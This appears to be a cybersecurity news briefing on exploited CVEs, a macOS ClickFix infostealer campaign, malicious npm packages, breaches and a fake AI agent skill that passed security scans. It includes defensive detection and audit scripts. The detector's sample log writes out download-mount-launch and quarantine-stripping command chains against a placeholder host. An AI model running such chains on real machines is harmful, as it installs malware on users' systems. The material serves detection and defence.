🚨 Critical Alerts
Cisco Unified CM flaw CVE-2026-20230 now exploited in attacks
Source: BleepingComputer
A high-severity server-side request forgery (SSRF) vulnerability, CVE-2026-20230, in Cisco Unified Communications Manager is now being actively exploited; affected deployments should be patched without delay.
New macOS ClickFix attack silently mounts DMGs to push infostealer
Source: BleepingComputer
A new macOS campaign using the ClickFix technique tricks users into pasting Terminal commands that silently download a malicious disk image (DMG), mount it, and launch the info-stealing malware inside it.
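The chain described above (download, mount, launch) is visible in process command-line telemetry. As an added example, not code from the BleepingComputer report, here is a heuristic that flags any single command line combining two or more stages of that chain, including quarantine-attribute stripping. The sample lines are constructed; the flags and hostnames in them are assumptions, not observed campaign artifacts.

```python
"""Heuristic for ClickFix-style DMG delivery chains in macOS process command lines.

Added example, not from the BleepingComputer report. The sample lines below are
constructed; the specific flags and hostnames in them are assumptions, not
observed campaign artifacts.
"""
from __future__ import annotations

import re
import shlex

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh"}
# xattr -c / -rc clears all attributes; naming com.apple.quarantine removes just that one.
QUARANTINE_FLAGS = {"-c", "-rc", "com.apple.quarantine"}


def _segments(cmdline: str) -> list[list[str]]:
    """Split a shell command line on |, ||, && and ; into argv token lists."""
    out = []
    for part in re.split(r"\s*(?:\|\||&&|;|\|)\s*", cmdline):
        try:
            toks = shlex.split(part)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            toks = part.split()
        if toks:
            out.append(toks)
    return out


def classify(cmdline: str) -> dict[str, bool]:
    """Report which stages of the download -> mount -> strip-quarantine -> launch
    chain appear in one command line."""
    stages = {"download": False, "mount": False, "quarantine_bypass": False, "launch": False}
    for toks in _segments(cmdline):
        cmd = toks[0].rsplit("/", 1)[-1]
        touches_volume = any("/Volumes/" in t for t in toks)
        if cmd in DOWNLOADERS:
            stages["download"] = True
        if cmd == "hdiutil" and "attach" in toks[1:]:
            stages["mount"] = True
        if cmd == "xattr" and QUARANTINE_FLAGS & set(toks):
            stages["quarantine_bypass"] = True
        # Launching from the mounted image: `open /Volumes/...`, a shell fed a
        # /Volumes/ path, or a /Volumes/ binary executed directly.
        if (cmd in {"open"} | SHELLS and touches_volume) or toks[0].startswith("/Volumes/"):
            stages["launch"] = True
    return stages


def is_suspicious(cmdline: str) -> bool:
    """Two or more chain stages in a single command line is the ClickFix tell:
    the victim pastes one line that does everything at once."""
    return sum(classify(cmdline).values()) >= 2


def scan(lines: list[str]) -> list[str]:
    """Return the command lines worth alerting on."""
    return [ln for ln in lines if is_suspicious(ln)]


# Constructed sample process command lines (e.g. from an EDR's process-start events).
SAMPLE_LOG = [
    "curl -sL https://example.invalid/update.dmg -o /tmp/u.dmg && hdiutil attach -nobrowse -quiet /tmp/u.dmg && open /Volumes/Update/Update.app",
    "hdiutil attach ~/Downloads/Xcode.dmg",
    "xattr -d com.apple.quarantine /Volumes/Installer/Installer.app; /Volumes/Installer/Installer.app/Contents/MacOS/Installer",
    "curl -s https://example.invalid/notes.txt -o /tmp/notes.txt",
    "ls -la /Volumes",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("SUSPICIOUS:", hit, classify(hit))
```

A lone `hdiutil attach` or a lone `curl` is normal developer activity, which is why the rule requires two stages in the same line; tune the stage list to your own telemetry before deploying it.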
Malicious npm Packages Pose as PostCSS Tools to Deliver Windows RAT
Source: The Hacker News
Cybersecurity researchers have uncovered a set of malicious npm packages, including 'aes-decode-runner-pro,' 'postcss-minify-selector,' and 'postcss-minify-selector-parser,' designed to deliver a Windows-based Remote Access Trojan (RAT) through a supply chain attack.
🔓 Breaches & Attacks
Tata Electronics confirms cyberattack as hackers leak data
Source: BleepingComputer
Tata Electronics has confirmed a cyberattack impacted parts of its IT infrastructure, leading to data leakage by the attackers.
Healthtech firm Xsolis suffers data breach impacting 1.4 million people
Source: BleepingComputer
Healthcare technology company Xsolis reported a data breach affecting nearly 1.4 million individuals after a phishing attack granted unauthorized network access to attackers.
JaredFromSubway MEV bot hacked in $15 million crypto theft
Source: BleepingComputer
The JaredFromSubway Ethereum MEV bot experienced a $15 million loss after an attacker manipulated its opportunity-detection logic with fake cryptocurrency trading opportunities.
🛡️ Vulnerabilities & Patches
CVE-2025-15467 (CVSS: 9.8 CRITICAL)
A stack-based buffer overflow in OpenSSL's CMS parsing, affecting Siemens products that embed OpenSSL, allows a remote attacker to cause a denial of service or potentially achieve remote code execution when the application parses a maliciously crafted CMS AuthEnvelopedData message with oversized AEAD parameters.
Remediation: Update affected Siemens products to the latest versions. Do not accept files from untrusted and unvalidated sources in affected applications. For specific products, vendor fixes are available (e.g., Update to V1.8.0 for Connector for Azure, V17 Update 9 for SIMATIC HMI panels, V3.3.2 for Databus, etc.). General recommendations include minimizing network exposure, using firewalls, and securing connected email servers.
CVE-2026-20230
A high-severity Server-Side Request Forgery (SSRF) vulnerability in Cisco Unified Communications Manager (CM) Server is currently being exploited in active attacks.
Remediation: Apply all available security patches from Cisco for Unified Communications Manager Server immediately to mitigate active exploitation.
CVE-2026-46746, CVE-2026-46748 (CVSS: 8.8 HIGH)
Multiple vulnerabilities in Siemens SINEC INS, including an OS Command Injection (CVE-2026-46746) allowing authenticated remote attackers to execute arbitrary commands via crafted directory names, and an Improper Privilege Management flaw (CVE-2026-46748) enabling local privilege escalation to root because a binary ships with the 'cap_dac_override' file capability, which lets the process bypass file permission checks.
Remediation: Update Siemens SINEC INS to V1.0 SP2 Update 6 or later. Additionally, minimize network exposure, locate control system networks behind firewalls, and use secure methods like VPNs for remote access.
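The cap_dac_override issue behind CVE-2026-46748 is a general class of misconfiguration worth auditing on any Linux host, not only SINEC INS. As an added example, not from the Siemens advisory, here is a small auditor that parses `getcap -r /` output (both the older and newer libcap formats) and reports file capabilities that are effectively root when any local user can run the binary. The sample output is constructed and the /opt/example paths are placeholders.

```python
"""Audit Linux file capabilities for ones that hand a local user root.

Added example, not from the Siemens advisory. The getcap output below is
constructed; the /opt/example paths are placeholders, not the affected SINEC
INS binary.
"""
from __future__ import annotations

import re
import subprocess

# Capabilities that are effectively root when granted to a binary any local user
# can run. cap_dac_override is the one behind CVE-2026-46748: it bypasses
# discretionary access control, so the process can read /etc/shadow or write
# root-owned files such as /etc/passwd regardless of their mode bits.
DANGEROUS = {
    "cap_dac_override": "bypasses file permission checks (read/write any file)",
    "cap_dac_read_search": "reads any file and traverses any directory",
    "cap_chown": "can chown any file to the caller",
    "cap_fowner": "bypasses owner checks (chmod, setxattr on any file)",
    "cap_setuid": "can setuid(0)",
    "cap_setgid": "can setgid(0)",
    "cap_sys_admin": "broad admin rights (mount, namespaces, ...)",
    "cap_sys_ptrace": "can ptrace root-owned processes",
    "cap_sys_module": "can load kernel modules",
}

CAP_RE = re.compile(r"cap_[a-z_]+")


def parse_getcap_line(line: str) -> tuple[str, list[str]] | None:
    """Accept both getcap output formats:
         /usr/bin/ping cap_net_raw=ep       (libcap >= 2.41)
         /usr/bin/ping = cap_net_raw+ep     (older libcap)
    and return (path, [capability names])."""
    m = re.match(r"^(?P<path>\S+)\s*=?\s*(?P<caps>.+)$", line.strip())
    if not m:
        return None
    return m.group("path"), CAP_RE.findall(m.group("caps"))


def find_dangerous(lines: list[str]) -> list[tuple[str, str, str]]:
    """(path, capability, why it matters) for every dangerous file capability."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        for cap in caps:
            if cap in DANGEROUS:
                findings.append((path, cap, DANGEROUS[cap]))
    return findings


def audit_system() -> list[tuple[str, str, str]]:
    """Run `getcap -r /` on the local host (needs libcap's getcap installed)."""
    out = subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                         stderr=subprocess.DEVNULL, text=True, check=False)
    return find_dangerous(out.stdout.splitlines())


# Constructed getcap output: two benign entries, one entry in the older format,
# and two binaries carrying capabilities that are as good as root.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/sbin/mtr-packet cap_net_raw=ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/opt/example/bin/agent cap_dac_override=ep
/opt/example/bin/helper cap_setuid,cap_net_bind_service=ep
"""

if __name__ == "__main__":
    for path, cap, why in find_dangerous(SAMPLE_GETCAP.splitlines()):
        print(f"{path}: {cap} -> {why}")
```

A finding matters in proportion to who can execute the file: a cap_dac_override binary with mode 0750 owned by root:root is a much smaller problem than one any user can run, so pair this list with a check of the binaries' mode bits and owners.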
🥷 Threat Actor Spotlight
Scattered Spider
Targets: Various organizations, including Transport for London.
Tactics: Cybercrime group that compromises corporate IT systems; members recently pleaded guilty to hacking Transport for London.
The Gentlemen RaaS
Targets: Organizations with Endpoint Detection and Response (EDR) solutions.
Tactics: Ransomware-as-a-service operation actively developing and using an EDR-killer tool, 'GentleKiller', to terminate up to 400 security processes before deploying ransomware.
AryStinger
Targets: Legacy home routers (over 4,300 infected devices observed).
Tactics: A new malware family infecting legacy home routers to establish a distributed reconnaissance and proxy network, focusing on intelligence gathering prior to direct attacks.
🔬 Indicators of Compromise (IoCs)
npm package name: aes-decode-runner-pro (malicious package delivering Windows RAT)
npm package name: postcss-minify-selector (malicious package delivering Windows RAT)
npm package name: postcss-minify-selector-parser (malicious package delivering Windows RAT)
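The quickest way to act on the npm IoCs above (and on the supply chain item in Critical Alerts) is to search lockfiles rather than package.json, since a malicious package can arrive as a transitive dependency. As an added example, not from The Hacker News article or any project, here is a checker for package-lock.json that handles both the flat v2/v3 format and the nested v1 format and reports which package pulled the hit in. The lockfile is constructed and its version numbers are placeholders, not the versions that were actually published.

```python
"""Check an npm lockfile for the malicious package names from this briefing.

Added example, not from The Hacker News article or any project. The lockfile
below is constructed; its version numbers are placeholders, not the versions
that were actually published.
"""
from __future__ import annotations

import json

MALICIOUS_NPM = {
    "aes-decode-runner-pro",
    "postcss-minify-selector",
    "postcss-minify-selector-parser",
}


def name_from_lock_key(key: str) -> str | None:
    """lockfileVersion 2/3 keys look like 'node_modules/a/node_modules/@s/b';
    the package name is everything after the last 'node_modules/'."""
    if not key:  # "" is the root project entry
        return None
    return key.rsplit("node_modules/", 1)[-1]


def parent_of(path: str) -> str:
    """Which package pulled this one in (the previous node_modules segment)."""
    parts = path.split("node_modules/")
    # ['', 'a/', '@s/b'] for a transitive dep, ['', 'b'] for a direct one
    return parts[-2].rstrip("/") if len(parts) > 2 else "(direct dependency)"


def find_malicious(lock: dict, blocklist: set[str] = MALICIOUS_NPM) -> list[dict]:
    hits: list[dict] = []
    if "packages" in lock:  # lockfileVersion 2 and 3: flat map keyed by install path
        for key, meta in lock["packages"].items():
            name = name_from_lock_key(key)
            if name in blocklist:
                hits.append({"name": name, "version": meta.get("version"),
                             "path": key, "via": parent_of(key)})
    else:  # lockfileVersion 1: nested "dependencies" tree
        def walk(deps: dict, prefix: str) -> None:
            for name, meta in deps.items():
                path = f"{prefix}node_modules/{name}"
                if name in blocklist:
                    hits.append({"name": name, "version": meta.get("version"),
                                 "path": path, "via": parent_of(path)})
                walk(meta.get("dependencies", {}), path + "/")
        walk(lock.get("dependencies", {}), "")
    return hits


def scan_lockfile(filename: str) -> list[dict]:
    """Load a package-lock.json from disk and check it."""
    with open(filename, encoding="utf-8") as fh:
        return find_malicious(json.load(fh))


# Constructed lockfile: a direct dependency on one IoC name and a transitive
# dependency on another, pulled in by a build helper.
SAMPLE_LOCK = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"postcss": "^8.4.0", "postcss-minify-selector": "^1.0.0"}},
        "node_modules/postcss": {"version": "8.4.0"},
        "node_modules/postcss-minify-selector": {"version": "1.0.3"},
        "node_modules/build-helper": {"version": "2.1.0",
                                      "dependencies": {"aes-decode-runner-pro": "^0.9.0"}},
        "node_modules/build-helper/node_modules/aes-decode-runner-pro": {"version": "0.9.1"},
    },
}

if __name__ == "__main__":
    for hit in find_malicious(SAMPLE_LOCK):
        print(f"{hit['name']}@{hit['version']} at {hit['path']} (via {hit['via']})")
```

Run it across every lockfile in CI output and build images, not just repositories: a package that was installed on a build host and then removed from the manifest still executed its install scripts there.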
📋 Compliance & Deadlines
Federal Post-Quantum Cryptography Migration (Executive Order)
Deadline: December 31, 2030 (key establishment), December 31, 2031 (digital signatures)
Summary: President Trump's executive order mandates federal agencies migrate high-value assets and high-impact systems to post-quantum cryptography by set deadlines to counter future quantum computing threats.
CISA Known Exploited Vulnerabilities (KEV) Catalog / BOD 26-04
Deadline: Ongoing (rapid remediation required)
Summary: CISA has added four new vulnerabilities (CVE-2025-67038, CVE-2026-34908, CVE-2026-34909, CVE-2026-34910) to its KEV Catalog, requiring Federal Civilian Executive Branch agencies to prioritize rapid remediation. All organizations are encouraged to adopt risk-based vulnerability management for these actively exploited flaws.
Android Developer Verification (Google)
Deadline: September 30, 2026
Summary: Google will begin enforcing Android developer verification in Brazil, Indonesia, Singapore, and Thailand, blocking normal installations of apps from unregistered developers on certified Android phones.
📰 Industry News
OpenAI Expands Daybreak With GPT-5.5-Cyber to Help Defenders Patch Security Flaws
OpenAI has released an enhanced GPT-5.5-Cyber model as part of its Daybreak initiative, aimed at assisting trusted defenders in identifying and patching software vulnerabilities through deeper analysis of large codebases.
Fake AI Agent Skill Passed Security Scans and Reportedly Reached 26,000 Agents
A security firm demonstrated that a fake AI agent skill could pass the security scans applied to it and was reportedly installed by approximately 26,000 agents (some on corporate accounts), highlighting blind spots in AI agent security and access control.
Canada’s Spy Agency Used First-of-Its-Kind Warrant to Clean Botnet-Infected Devices
The Canadian Security Intelligence Service (CSIS) obtained an unprecedented Federal Court warrant to remotely access and neutralize foreign-run botnets infecting servers, home routers, and IoT devices within Canadian territory.
Stay secure. If you found this briefing useful, please subscribe to 0DayDaily and share.
